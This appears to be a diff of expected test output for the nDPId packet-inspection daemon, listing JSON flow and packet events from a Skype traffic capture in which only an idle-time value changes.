-00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1431970635489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970635489,"pkt":"0NQSxnP1PBXCt3IOCABFAABAPS1AAEAGAk3AqAEiF84hpsgfAbv4Tz2XAAAAALAC\/\/9zuAAAAgQFtAEDAwUBAQgKPjGKEwAAAAAEAgAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635489,"flow_last_seen":1431970635489,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970635489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51231,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1431970635489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970635489,"pkt":"0NQSxnP1PBXCt3IOCABFAABAPS1AAEAGAk3AqAEiF84hpsgfAbv4Tz2XAAAAALAC\/\/9zuAAAAgQFtAEDAwUBAQgKPjGKEwAAAAAEAgAA"} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1431970635531,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431970635531,"pkt":"0NQSxnP1PBXCt3IOCABFAABDdt0AAEARgFnAqAEiwKgBAeUHADUAL+4jvNsBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAHAAB"} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1431970635531,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431970635531,"pkt":"0NQSxnP1PBXCt3IOCABFAABDiigAAEARbQ7AqAEiwKgBAe0QADUAL\/kqxMsBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAAQAB"} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1431970635534,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970635534,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7yB8YNTxd+E89mKASOJCdjgAAAgQFrAQCCArsPW3FPjGKEwEDAwU="} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1431970635534,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970635534,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0P2xAAEAGABrAqAEiF84hpsgfAbv4Tz2YGDU8XoAQECz0iAAAAQEICj4xij\/sPW3F"} -00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970635489,"flow_last_seen":1431970635535,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970635535,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51231,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skype.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1431970635534,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970635534,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7yB8YNTxd+E89mKASOJCdjgAAAgQFrAQCCArsPW3FPjGKEwEDAwU="} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1431970635534,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970635534,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0P2xAAEAGABrAqAEiF84hpsgfAbv4Tz2YGDU8XoAQECz0iAAAAQEICj4xij\/sPW3F"} +00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970635489,"flow_last_seen":1431970635535,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970635535,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51231,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skype.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1431970635681,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970635681,"pkt":"0NQSxnP1PBXCt3IOCABFAAA762oAAEARC9TAqAEiwKgBAfrwADUAJ8Zq760BAAABAAAAAAAAA2FwaQVza3lwZQNjb20AAAEAAQ=="} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1431970635681,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970635681,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7\/zoAAEAR+APAqAEiwKgBAcLIADUAJ6plKNsBAAABAAAAAAAAA2FwaQVza3lwZQNjb20AABwAAQ=="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1431970635827,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970635827,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/rmUAAEARSNXAqAEiwKgBAfWbADUAK9VUuF8BAAABAAAAAAAABWRzbjEzAWQFc2t5cGUDbmV0AAABAAE="} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1431970635828,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970635828,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/dFsAAEARgt\/AqAEiwKgBAebpADUAK335A20BAAABAAAAAAAABWRzbjEzAWQFc2t5cGUDbmV0AAAcAAE="} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1431970635828,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970635828,"pkt":"0NQSxnP1PBXCt3IOCABFAABLWNIAAEARnlzAqAEiwKgBAeD4ADUANz9NJ5kBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDExAXIFc2t5cGUDbmV0AAABAAE="} 
00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1431970635828,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970635828,"pkt":"0NQSxnP1PBXCt3IOCABFAABLGiMAAEAR3QvAqAEiwKgBAdB8ADUAN25j7f4BAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDExAXIFc2t5cGUDbmV0AAAcAAE="} -00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636044,"flow_last_seen":1431970636044,"flow_idle_time":7440000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":1,"thread_ts_msec":1431970636044,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00744{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1431970636044,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":263,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":263,"pkt_l4_len":229,"thread_ts_msec":1431970636044,"pkt":"PBXCt3IO0NQSxnP1CABFAAD5QB1AADEGlPMRj6CVwKgBIhRnxOfKLqrmIALxFIAYAQoi5AAAAQEIClVX3cw+MS9sFwMBAMAQLvPrUolszeBH4PjooKgoykESMntuxk1Te2w+x8Oya6GSybBw6qqEM+wWK2sXwWrrizJ5XKzKOAmSZesb7xCcv3da\/+28YcXK\/F7zVFmE31vvvLV8YkG8GBOlPbpZKZERb9mwy2LwmHQtz7O0hAoAaXw9xzeYM92S6l8kX5r5cFIIVhHHc18X56Qt2VFcbjB+OTKH9K3bn722DOl83K579IAjLFDRbrYAdebZ2GL8xgCQwxYSG690LowE4mV3zjs="} 
-00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636044,"flow_last_seen":1431970636044,"flow_idle_time":7440000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":1,"thread_ts_msec":1431970636044,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1431970636044,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970636044,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0K69AAEAGmybAqAEiEY+glcTnFGcgAvEUyi6rq4AQD\/mVBgAAAQEICj4xjDlVV93M"} -00599{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1431970636045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"thread_ts_msec":1431970636045,"pkt":"0NQSxnP1PBXCt3IOCABFAACO6xNAAEAG22fAqAEiEY+glcTnFGcgAvEUyi6rq4AYEAB7VwAAAQEICj4xjDlVV93MFwMBACDcBm8C5CuEds5WH7uOVSaoSAeWe3pVfjpiQwGsBHUCdhcDAQAwqX6WBIxQfVe36rHY2TMg9Ev1HCHJmLbDku3Ki37TObTq6YVIEEF1VGVKw\/q+D6y6"} 
+00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636044,"flow_last_seen":1431970636044,"flow_idle_time":7560000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":1,"thread_ts_msec":1431970636044,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00744{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1431970636044,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":263,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":263,"pkt_l4_len":229,"thread_ts_msec":1431970636044,"pkt":"PBXCt3IO0NQSxnP1CABFAAD5QB1AADEGlPMRj6CVwKgBIhRnxOfKLqrmIALxFIAYAQoi5AAAAQEIClVX3cw+MS9sFwMBAMAQLvPrUolszeBH4PjooKgoykESMntuxk1Te2w+x8Oya6GSybBw6qqEM+wWK2sXwWrrizJ5XKzKOAmSZesb7xCcv3da\/+28YcXK\/F7zVFmE31vvvLV8YkG8GBOlPbpZKZERb9mwy2LwmHQtz7O0hAoAaXw9xzeYM92S6l8kX5r5cFIIVhHHc18X56Qt2VFcbjB+OTKH9K3bn722DOl83K579IAjLFDRbrYAdebZ2GL8xgCQwxYSG690LowE4mV3zjs="} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636044,"flow_last_seen":1431970636044,"flow_idle_time":7560000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":1,"thread_ts_msec":1431970636044,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1431970636044,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970636044,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0K69AAEAGmybAqAEiEY+glcTnFGcgAvEUyi6rq4AQD\/mVBgAAAQEICj4xjDlVV93M"} +00599{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1431970636045,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"thread_ts_msec":1431970636045,"pkt":"0NQSxnP1PBXCt3IOCABFAACO6xNAAEAG22fAqAEiEY+glcTnFGcgAvEUyi6rq4AYEAB7VwAAAQEICj4xjDlVV93MFwMBACDcBm8C5CuEds5WH7uOVSaoSAeWe3pVfjpiQwGsBHUCdhcDAQAwqX6WBIxQfVe36rHY2TMg9Ev1HCHJmLbDku3Ki37TObTq6YVIEEF1VGVKw\/q+D6y6"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636300,"flow_last_seen":1431970636300,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970636300,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":50055,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1431970636300,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970636300,"pkt":"0NQSxnP1PBXCt3IOCABFAABLV\/cAAEARnzfAqAEiwKgBAcOHADUANwqgVG4BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636300,"flow_last_seen":1431970636300,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970636300,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":50055,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636301,"flow_last_seen":1431970636301,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970636301,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1431970636301,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970636301,"pkt":"0NQSxnP1PBXCt3IOCABFAABLvh0AAEARORHAqAEiwKgBAcopADUAN1kA5GsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636301,"flow_last_seen":1431970636301,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970636301,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51753,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636340,"flow_last_seen":1431970636340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970636340,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51232,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1431970636340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970636340,"pkt":"0NQSxnP1PBXCt3IOCABFAABAozBAAEAGBGnAqAEinTg0HMggAbskulgsAAAAALAC\/\/+RjgAAAgQFtAEDAwUBAQgKPjGNXAAAAAAEAgAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636340,"flow_last_seen":1431970636340,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970636340,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51232,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1431970636340,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970636340,"pkt":"0NQSxnP1PBXCt3IOCABFAABAozBAAEAGBGnAqAEinTg0HMggAbskulgsAAAAALAC\/\/+RjgAAAgQFtAEDAwUBAQgKPjGNXAAAAAAEAgAA"} 
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1431970636420,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970636420,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6ONsAAEARvmTAqAEiwKgBAfgaADUAJptGWcsBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1431970636420,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970636420,"pkt":"0NQSxnP1PBXCt3IOCABFAABAsV0AAEARRdzAqAEiwKgBAdb0ADUALMTUeDABAAABAAAAAAAAAWEGY29uZmlnBXNreXBlA2NvbQAAAQAB"} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1431970636420,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970636420,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQaoAAEARtY\/AqAEiwKgBAf3LADUALKDXdTsBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlA2NvbQAAHAAB"} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1431970636573,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970636573,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtJ2dODQcwKgBIgG7yCDj6Zk0JLpYLaASOJC0hQAAAgQFrAQCCApMX+vyPjGNXAEDAwk="} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1431970636573,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970636573,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0faxAAEAGKfnAqAEinTg0HMggAbskulgt4+mZNYAQECwKzQAAAQEICj4xjj9MX+vy"} 